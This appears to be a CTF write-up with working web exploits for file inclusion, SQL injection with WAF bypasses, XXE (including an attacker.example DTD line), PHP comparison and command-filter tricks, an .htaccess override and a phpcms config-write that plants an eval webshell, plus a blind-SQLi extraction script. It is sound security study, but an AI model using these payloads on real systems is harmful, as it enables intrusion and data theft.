CTF is back!!!! 😁😁😁😁 First let's grab a few easy ones! Time to grab Bugfu

file_include


<?php
$file = $_GET['file'];
if(isset($file)){
    include ($file);
}
else{
    echo '<script>window.location.href="./index.php?file=xiaochou.html"</script>';
}

http://1295ae1e-d77e-4cb0-8e84-309c0da0fcdc.ctf.moonback.xyz:8001/index.php?file=pHp://FilTer/convert.base64-encode/resource=flag.php

Key point: file inclusion vulnerability! A plain include of flag.php would execute it instead of showing it, so the target is wrapped in php://filter/convert.base64-encode and the base64 output is decoded. Wrapper and filter names are case-insensitive, which is why pHp://FilTer also gets past a lowercase keyword check.
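Added example, not part of the original writeup: a small Python helper for the php://filter trick. It builds the wrapped URL for any file (host and file path are placeholders), pulls the base64 blob out of whatever HTML the vulnerable index.php prints around it, and decodes it back to source. The response body used below is constructed inline so the decoder runs offline.

```python
import base64
import re
from urllib.parse import urlencode
from urllib.request import urlopen


def filter_url(base: str, path: str) -> str:
    # php://filter makes PHP base64-encode the included file instead of executing it.
    # Wrapper and filter names are case-insensitive, which is why pHp://FilTer works too.
    target = "php://filter/convert.base64-encode/resource=" + path
    return base + "?" + urlencode({"file": target})


def extract_source(body: str) -> str:
    # include() prints the encoded file straight into the page, so the source is the
    # longest base64-looking run in the response; re-add padding in case it was stripped.
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob found in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def fetch_source(base: str, path: str) -> str:
    # Live version: GET the wrapped URL and decode the body (only against a target you may test)
    with urlopen(filter_url(base, path), timeout=10) as resp:
        return extract_source(resp.read().decode("utf-8", errors="replace"))


# Constructed response: what index.php would return when flag.php is pulled through the filter
SAMPLE_FLAG_PHP = "<?php\n$flag = 'flag{constructed-sample}';\n"
SAMPLE_BODY = ("<html><body>"
               + base64.b64encode(SAMPLE_FLAG_PHP.encode()).decode()
               + "</body></html>")

if __name__ == "__main__":
    print(filter_url("http://target.example/index.php", "flag.php"))  # placeholder host
    print(extract_source(SAMPLE_BODY))
```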

ezsql


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
This is a very sql!!!

Error-based injection works directly:

Tested keywords: union select order
UNION doesn't seem to work anymore! Error-based and blind should still work!
Go straight for it:
1' AND 9666=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x637466),1,1))>48),SLEEP(5),9666)--
http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id=1' and sleep(5) -- -

Database name: ctf

if() works

http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id=-2' uniunionon seselectlect 1,2,3 -- -


http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id= ' and updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) from information_schema.tables where table_schema like "ctf"),0x7e),1); %23


Tables in ctf: emails,fl4g,flag,users~

updatexml(1,concat(0x7e,(seleselectct group_concat(0x23,flag,0x23) from fl4g),0x7e),1);

flag{a27cfdeb-b16c-4ae1-a4f
The output is cut off (the XPATH syntax error only echoes the first 32 characters), so read the tail with right():

updatexml(1,concat(0x7e,right((seleselectct group_concat(0x23,flag,0x23) from fl4g),20),0x7e),1); -- -
a4f9-a3d75403648b}
flag{a27cfdeb-b16c-4ae1-a4f9-a3d75403648b}

Key point: SQL injection! Double-writing keywords (uniunionon, seselectlect) to bypass the WAF.

The backend probably does a single-pass string replace, not a regex match: the inner copy of the keyword is deleted once and the outer halves close up into the keyword again.
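Added example, not from the writeup: a Python model of the two WAF behaviours the note above distinguishes. naive_waf is the single-pass str_replace the writeup suspects, fixed_point_waf repeats the same deletion until nothing changes, and armor double-writes keywords the way uniunionon / seselectlect does. The blocklist is an assumption (union and select come from the page, the other two are guessed).

```python
# Assumed blocklist: the page shows union and select being double-written; the rest are guesses
BLOCKED = ("union", "select", "from", "where")


def naive_waf(payload: str) -> str:
    # One pass of str_replace per keyword: the behaviour the writeup suspects the backend has
    for kw in BLOCKED:
        payload = payload.replace(kw, "")
    return payload


def fixed_point_waf(payload: str) -> str:
    # Repeat the same deletion until the text stops changing; nested copies no longer survive
    while True:
        stripped = naive_waf(payload)
        if stripped == payload:
            return payload
        payload = stripped


def double_write(kw: str) -> str:
    # Nest a copy of the keyword inside itself: select -> seselectlect, union -> ununionion.
    # A single pass deletes the inner copy and the outer halves rejoin into the keyword.
    half = len(kw) // 2
    return kw[:half] + kw + kw[half:]


def armor(payload: str) -> str:
    # Double-write every blocked keyword in a payload before sending it
    for kw in BLOCKED:
        payload = payload.replace(kw, double_write(kw))
    return payload


# The page's table-listing payload, written normally; armor() produces the sendable form
PAGE_PAYLOAD = ("' and updatexml(1,concat(0x7e,(select group_concat(table_name) "
                "from information_schema.tables where table_schema like \"ctf\"),0x7e),1);#")

if __name__ == "__main__":
    print(armor(PAGE_PAYLOAD))
    print(naive_waf(armor(PAGE_PAYLOAD)))        # keywords restored: the query the DB receives
    print(fixed_point_waf(armor(PAGE_PAYLOAD)))  # a recursive filter still strips them
```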

just_xxe


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "pHp://FilTer/convert.base64-encode/resource=/var/www/html/flag.php" >]>
<info><username>&xxe;</username><password>admin1122</password></info>

Key point: XXE + PHP stream wrapper (php://filter), so flag.php comes back base64-encoded inside the entity instead of being parsed as XML.
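Added example, not from the writeup: a Python pre-parse check for the pattern above. It uses expat's entity-declaration callback to list every SYSTEM/PUBLIC entity a document declares, which is the check a server should run before handing untrusted XML to a real parser. The page's payload is embedded as the first sample; the benign document and the DTD URL in the parameter-entity sample are constructed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


def find_external_entities(doc: bytes) -> list:
    # Walk the DTD with expat and record every entity declared with SYSTEM/PUBLIC
    # (expat passes value=None for external entities). Only declarations matter here,
    # so a parse error later in the body is ignored.
    found = []

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if value is None:
            found.append(("%" + name if is_param else name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(doc, True)
    except expat.ExpatError:
        pass
    return found


def parse_untrusted(doc: bytes):
    # Gate: refuse any document that declares external entities, then parse normally
    ext = find_external_entities(doc)
    if ext:
        raise ValueError("external entities declared: %r" % ext)
    return ET.fromstring(doc)


# Sample 1: the page's payload (copied from the writeup)
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "pHp://FilTer/convert.base64-encode/resource=/var/www/html/flag.php" >]>
<info><username>&xxe;</username><password>admin1122</password></info>"""

# Sample 2: constructed blind-XXE shape, external DTD pulled through a parameter entity
PE_SAMPLE = b"""<!DOCTYPE a [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">%ext;]><a/>"""

# Sample 3: constructed benign login document
BENIGN = b"""<?xml version="1.0"?><info><username>alice</username><password>x</password></info>"""

if __name__ == "__main__":
    for name, sample in (("payload", PAYLOAD), ("param entity", PE_SAMPLE), ("benign", BENIGN)):
        print(name, find_external_entities(sample))
```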

ezpass

<?php
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['name']))
{
    $str = $_GET['name'];
    is_numeric($str)?die("no numeber"):NULL;
    if($str==521){
        if (isset($_POST['wsl']) and isset($_POST['pp']))
        {
            if ($_POST['wsl'] === $_POST['pp'])
                echo "wsl can not be pangpang.";
            else if(md5($_POST['wsl']) == md5($_POST['pp']))
                echo(shell_exec( 'cat /flag' ));
            else
                echo "fail!";
        }
    }

}
?>
?name=521a
("521a" is not numeric, but under PHP 7's loose comparison "521a" == 521 is true because the string is converted by its leading digits. PHP 8 compares a non-numeric string with an int as strings, so this only works on PHP 7.)
wsl[]=QNKCDZO&pp[]=s878926199a
(Two different arrays, so === fails; md5() of an array returns NULL on PHP 7, and NULL == NULL passes. PHP 8 throws a TypeError instead. The plain values QNKCDZO and s878926199a work as well: both md5 hashes start with 0e followed by digits, which == treats as 0 == 0.)
;a=g;more$IFS$1/fla$a
($IFS$1 expands to whitespace, the empty positional parameter $1 just terminates the variable name, and fla$a reassembles "flag" to get past a keyword filter.)

;echo Y2F0IC9mbGFn |base64 -d |sh   The pipe character is filtered, so this one doesn't work!

Key point: command execution
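Added example, not part of the writeup: the PHP comparison rules behind both bypasses, re-implemented in Python so they can be checked offline. The md5 values come from hashlib; the PHP 7 and PHP 8 semantics in the comments are the language rules as I know them, not something the page states.

```python
import hashlib
import re

# PHP numeric-string grammar: optional leading whitespace, sign, int or float, optional exponent
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
LEADING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php_is_numeric(s: str) -> bool:
    return bool(NUMERIC.match(s))


def php7_loose_eq(a, b) -> bool:
    # Subset of PHP 7's ==: two numeric strings compare as numbers ("0e1" == "0e2", both 0.0);
    # an int against a string converts the string by its leading numeric prefix ("521a" == 521).
    if isinstance(a, str) and isinstance(b, str):
        if php_is_numeric(a) and php_is_numeric(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, str):
        a, b = b, a
    m = LEADING.match(b)
    return float(a) == (float(m.group(0)) if m else 0.0)


def php8_loose_eq(a, b) -> bool:
    # PHP 8 keeps the numeric-string rule but compares a number with a non-numeric string as strings
    if isinstance(a, str) and isinstance(b, str):
        return php7_loose_eq(a, b)
    if isinstance(a, str):
        a, b = b, a
    if php_is_numeric(b):
        return float(a) == float(b)
    return str(a) == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h: str) -> bool:
    # "0e" followed only by digits is the numeric string 0 * 10^n, i.e. 0.0
    return re.fullmatch(r"0e\d+", h) is not None


def md5_collides_loosely(x: str, y: str) -> bool:
    # The ezpass check: x !== y, yet md5(x) == md5(y) under loose comparison
    return x != y and php7_loose_eq(md5_hex(x), md5_hex(y))


if __name__ == "__main__":
    for s in ("QNKCDZO", "s878926199a"):
        print(s, md5_hex(s), is_magic_hash(md5_hex(s)))
    print("PHP7  '521a' == 521:", php7_loose_eq("521a", 521))
    print("PHP8  '521a' == 521:", php8_loose_eq("521a", 521))
```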

cookie_spoofing

The first time I did it I thought that was it! Turns out the challenge was broken! 😁

Key point: HTTP request packets

file_upload


.htaccess:
SetHandler application/x-httpd-php

Key points: file upload + Apache .htaccess handler override + MIME-type bypass. Upload the .htaccess above first: it tells Apache to run every file in that directory as PHP, so an uploaded "image" carrying PHP is executed. This only works when the server's AllowOverride lets .htaccess set handlers.

ezezsql

Filtered:
sleep
union
select
and
=
(spaces as well, so /**/ takes their place)
Boolean-based blind injection it is!

-1/**/or/**/1#

-1/**/or/**/()#

-1/**/or/*!(Select/**/1)*/#

-1/**/or/**/(select/**/1);#

-1/**/or/**/case/**/when/**/ascii(substr(database()/**/from/**/1/**/for/**/1))>80/**/then/**/1/**/else/**/0/**/end#

Database: dropsec
Tables: fl4g,pics
Column: flag
flag{22eb7e17-9d45-4297-ab8e-455e3993dbee}

exp

# Then binary search, which is much faster:
# -*- coding: UTF-8 -*-
import base64
import time
import requests

url = "http://60ef7134-093a-4334-a0b2-5d549e08b4c1.ctf.moonback.xyz:8001/index.php"
flag = ''

def payload(i, j):
    # Earlier probes, kept for reference. The first three are templates carried over from another
    # challenge (schema 'geek', table 'F1naI1y'); the rest were used here in order: database name,
    # table names, column names, then the flag itself.
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)  # database names
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)  # table names
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)  # column names
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr(database()/**/from/**/%d/**/for/**/1))>%d/**/then/**/1/**/else/**/0/**/end#"%(i,j)
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)/**/like('dropsec'))/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#"%(i,j)
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)/**/like('fl4g'))/**/from/**/%d/**/for/**/1))>/**/(%d)/**/then/**/1/**/else/**/0/**/end/**/#;"%(i,j)
    sql = "-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(flag))from(fl4g))/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#"%(i,j)
    # Variants with mid()/LEFT() for reading a different window of a long group_concat() result:
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr(mid((select(group_concat(flag))from(fl4g))/**/from/**/%d/**/for/**/1),2,4))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#"%(i,j)
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr(LEFT((select(group_concat(value))from(flag)),10)/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#;"%(i,j)
    # sql = "-1/**/or/**/case/**/when/**/ascii(substr(mid((select(group_concat(value))from(flag)),32,45)/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#;"%(i,j)

    # The challenge reads id as base64, so encode the probe (decoded to str so requests sends plain text)
    data = {"id": base64.b64encode(sql.encode('utf-8')).decode('ascii')}
    while True:
        r = requests.get(url, params=data)
        print(r.url)
        if r.status_code != 429:
            break
        print('too fast')   # rate limited: wait and resend the same probe
        time.sleep(4)
    # This sentence shows up only when the injected condition is true
    return 1 if "I will tell you what a real hacker is!" in r.text else 0

def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:                 # ascii(char) > mid
                low = mid + 1
            else:
                high = mid - 1
        f = (low + high + 1) // 2   # equals low: the character's code
        if f == 127 or f == 31:     # 31: substr() ran past the end (ascii('') is 0); 127: out of range
            break
        # print(f)
        flag += chr(f)
        print(flag)

exp()
print(flag)

Key point: SQL injection, boolean-based blind
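Added example, not from the writeup: the same boolean-blind binary search run against a local SQLite stand-in for the challenge, so it can be executed offline. The schema, the flag value and the "hacker?" response are constructed; table and column names follow the page. The probe is the page's CASE WHEN payload spelled for SQLite (unicode() and substr(x,i,1) instead of ascii() and substr(x from i for 1)), and the stand-in filter is the page's blocklist minus select, which the page's own working payloads contain, plus the space character.

```python
import sqlite3

# Constructed stand-in for the challenge database: names from the writeup, flag made up
SCHEMA = """
CREATE TABLE pics (id INTEGER, title TEXT);
INSERT INTO pics VALUES (1, 'one'), (2, 'two');
CREATE TABLE fl4g (flag TEXT);
INSERT INTO fl4g VALUES ('flag{constructed-sample-flag}');
"""
# The page's blocklist minus select (its own working payloads contain it); spaces assumed filtered
BLOCKED = ("sleep", "union", "and", "=", " ")
TRUE_MARKER = "I will tell you what a real hacker is!"


def make_target():
    # Vulnerable endpoint: id is concatenated unquoted, and the page text leaks the row count
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)

    def endpoint(user_id: str) -> str:
        if any(bad in user_id for bad in BLOCKED):
            return "hacker?"
        rows = db.execute(f"SELECT title FROM pics WHERE id = {user_id}").fetchall()
        return TRUE_MARKER if rows else "nothing here"
    return endpoint


def payload(i: int, j: int, expr: str) -> str:
    # SQLite spelling of the page's probe: true when the code of character i of expr is > j.
    # /**/ stands in for every space, and there is no '=' anywhere in the probe.
    return (f"-1/**/or/**/case/**/when/**/unicode(substr({expr},{i},1))>{j}"
            "/**/then/**/1/**/else/**/0/**/end")


def extract(endpoint, expr: str, max_len: int = 256) -> str:
    # Binary search each character over the printable range, as the writeup's exp() does
    out = ""
    for i in range(1, max_len + 1):
        low, high = 31, 127
        while low <= high:
            mid = (low + high) // 2
            if TRUE_MARKER in endpoint(payload(i, mid, expr)):
                low = mid + 1       # code > mid
            else:
                high = mid - 1
        if low in (31, 127):        # 31: past the end (unicode('') is NULL); 127: not printable
            break
        out += chr(low)
    return out


# Expressions to extract: the flag, and the table list (SQLite keeps it in sqlite_master)
FLAG_EXPR = "(select/**/group_concat(flag)/**/from/**/fl4g)"
TABLES_EXPR = ("(select/**/group_concat(name)/**/from/**/sqlite_master"
               "/**/where/**/type/**/like/**/'table')")

if __name__ == "__main__":
    ep = make_target()
    print(extract(ep, TABLES_EXPR))
    print(extract(ep, FLAG_EXPR))
```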

backdoor

/shell.php (a webshell already sitting on the box)
cat /*

Key point: full-featured webshell ("大马") and privilege escalation

cnf_write

<?php
highlight_file(__FILE__);
error_reporting(0);

function new_addslashes($string) {
    if(!is_array($string)) return addslashes($string);
    foreach($string as $key => $val) $string[$key] = new_addslashes($val);
    return $string;
}
if(!get_magic_quotes_gpc()) {
    $_POST = new_addslashes($_POST);
    $_GET = new_addslashes($_GET);
    $_REQUEST = new_addslashes($_REQUEST);
    $_COOKIE = new_addslashes($_COOKIE);
}
if(isset($_POST['dosubmit'])) {
    $file = __DIR__ .'/config.php';
    require $file;
    $key = $_POST['info']['name'];
    if(!isset($LANG[$key])) {
        $content = file_get_contents($file);
        $content = substr($content,0,-3);
        $data = $content."\n\$LANG['$key'] = '$_POST[language]';\n?>";
        file_put_contents($file,$data);
    } elseif(isset($LANG[$key]) && $LANG[$key]!=$_POST['language']) {
        $content = file_get_contents($file);
        $content = str_replace($LANG[$key],$_POST['language'],$content);
        file_put_contents($file,$content);
    }
}

This one!!! I can't do it!

phpcms vulnerability reproduction

Don't know how to exploit it!

$key = $_POST['info']['name'];
info[name]=111

Key point: phpcms code vulnerability (the config-file write in phpcms v9.6.3)!

Local reproduction. config.php starts out as:
<?php
$LANG['member_manage'] = 'admin';
?>

http://127.0.0.1/1.php?reset=1 (local copy of the vulnerable script)

First attempt:
dosubmit=1
info[name]=member_manage   (so $key = member_manage, a key that already exists in config.php)
language=?><?phpinfo();?>



http://j0k3r.top/2019/10/09/phpcmsv9.6.3_background_rce/#%E7%AC%AC%E4%BA%8C%E6%AC%A1
This article explains it!
The principle: the value that require and file_get_contents read back has its backslash already consumed, while the POSTed language is run through addslashes, so 1' arrives as string(3) "1\'".

The check $LANG[$key]!=$_POST['language'] therefore holds, and str_replace rewrites the 1' inside the original $LANG['1'] = '1\''; into 1\', which is written back to the file. Every round adds one backslash:

1'   becomes   1\'

'    becomes   \'

dosubmit=1&info[name]=member_manage&language='?><?php @eval($_POST[upload]);?>

Try a harmless value first:
dosubmit=1&info[name]=member_manage&language='a
After the first submission the file holds '\'a':
$LANG['member_manage'] = '\'a';
?>
After the second submission it holds '\\'a', and the a' now sits outside the string!
$LANG['member_manage'] = '\\'a';

So submit '?><?php @eval($_POST[upload]);?> twice!
'?><?php @eval($_POST[upload]);?>

First time (the \' is an escaped quote, so the payload is still plain string data):
$LANG['member_manage'] = '\'?><?php @eval($_POST[upload]);?>';

Second time: require now yields the unescaped '?><?php ... as $LANG['member_manage'], the POSTed value is the escaped \'?><?php ..., the two differ, and str_replace turns the single backslash into \\, an escaped backslash. The string closes at the very next quote, ?> leaves PHP mode, and the <?php @eval(...);?> that follows runs the next time config.php is required:
$LANG['member_manage'] = '\\'?><?php @eval($_POST[upload]);?>';
See the screenshot below!

A one-shot variant that breaks out through the key instead. The key goes through addslashes too, so a trailing quote in it becomes \' and drags the ] = ' that follows into the first string literal (the key has to carry that quote, otherwise the \' in the written key below cannot appear):
dosubmit=1&info[name]=];phpinfo();//1'&language=];phpinfo();//1'

This key is not yet in $LANG, so the line gets appended:
$LANG['];phpinfo();//1\'] = '];phpinfo();//1\'';

PHP reads it as $LANG['...'] ; phpinfo(); // ... and phpinfo() runs as soon as config.php is included again.
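Added example, not phpcms code and not from the writeup: the config-write handler above transcribed to Python so the two submissions can be replayed offline and the written lines inspected. addslashes and the single-quoted-string escape rules are re-implemented here; config.php starts from the page's $LANG['member_manage'] = 'admin';.

```python
import re


def addslashes(s: str) -> str:
    # PHP addslashes(): a backslash before ' " \ and NUL, nothing else
    return re.sub(r"(['\"\\])", r"\\\1", s).replace("\0", "\\0")


def php_sq_unescape(body: str) -> str:
    # Value of a PHP single-quoted literal body: only \\ and \' are escape sequences
    return re.sub(r"\\([\\'])", r"\1", body)


# A well-formed  $LANG['key'] = 'value';  line, quotes inside allowed only when escaped
LANG_LINE = re.compile(r"\$LANG\['((?:[^'\\]|\\.)*)'\]\s*=\s*'((?:[^'\\]|\\.)*)';")
# Same line with an arbitrary tail, to see what ends up outside the value literal
BROKEN = re.compile(r"^\$LANG\['(?:[^'\\]|\\.)*'\]\s*=\s*'((?:[^'\\]|\\.)*)'(.*)$")


def load_lang(content: str) -> dict:
    # Stand-in for `require $file`: the $LANG entries PHP would see, escapes resolved
    return {php_sq_unescape(k): php_sq_unescape(v) for k, v in LANG_LINE.findall(content)}


def submit(content: str, key: str, language: str) -> str:
    # The page's handler, step for step: POST data through addslashes, then either append a
    # new key or str_replace the old value with the new one, and write the file back
    key, language = addslashes(key), addslashes(language)
    lang = load_lang(content)
    if key not in lang:
        return content[:-3] + "\n$LANG['%s'] = '%s';\n?>" % (key, language)
    if lang[key] != language:
        return content.replace(lang[key], language)
    return content


def breaks_out(line: str) -> bool:
    # Does the value literal close early, leaving a ?> (and the <?php after it) outside the string?
    m = BROKEN.match(line)
    return bool(m) and "?>" in m.group(2)


CONFIG = "<?php\n$LANG['member_manage'] = 'admin';\n?>"
PAYLOAD = "'?><?php @eval($_POST[upload]);?>"


def lang_line(content: str) -> str:
    return next(l for l in content.splitlines() if l.startswith("$LANG['member_manage']"))


def exploit(content: str = CONFIG, payload: str = PAYLOAD):
    # Two identical submissions: the first writes \' (still inside the string), the second
    # turns it into \\' which closes the string, so ?> ends PHP mode and the <?php tag runs
    first = submit(content, "member_manage", payload)
    second = submit(first, "member_manage", payload)
    return lang_line(first), lang_line(second)


if __name__ == "__main__":
    for line in exploit():
        print(line, "  -> executes:", breaks_out(line))
```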

[screenshot]

sql


Key point: SQL injection